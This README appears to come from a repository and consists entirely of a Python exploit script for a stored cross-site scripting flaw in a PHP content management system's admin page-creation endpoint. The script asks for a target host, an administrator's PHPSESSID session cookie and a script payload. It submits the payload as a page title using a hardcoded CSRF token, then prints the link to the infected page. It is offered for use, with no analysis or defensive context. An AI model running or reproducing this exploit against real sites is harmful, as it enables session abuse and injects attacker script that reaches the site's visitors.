README.md
Rendering markdown...
import requests
import re
def runXSS(target, cookie, data):
exploit = requests.post(target, cookies=cookie, data=data).text
if re.search('exploit', exploit):
return 'OK'
else:
return 'ERROR'
if __name__ == '__main__':
print('[*] Ex) http://www.target.com -> www.target.com')
url = input('Target : ')
print('[*] Required admin\'s PHPSESSID.')
PHPSESSID = input('PHPSESSID : ')
pagename = input('Pagename : ')
script = input('Script : ')
target = 'http://' + url + '/admin/index.php?id=pages&action=add_page'
cookie = {'PHPSESSID':PHPSESSID}
data = {'csrf':'9c1763649f4e5ce611d29ef5cd10914fa61e91f5',\
'page_title':script,\
'page_name':pagename,\
'page_meta_title':'',\
'page_keywords':'',\
'page_description':'',\
'pages':0,\
'templates':'index',\
'status':'published',\
'access':'public',\
'editor':'',\
'page_tags':'',\
'add_page_and_exit':'Save+and+Exit',\
'page_date':'9999-99-99'}
result = runXSS(target, cookie, data)
print('-' * 69)
if result == 'OK':
print('[+] LINK : http://' + url + '/' + pagename)
else:
print('[-] Error')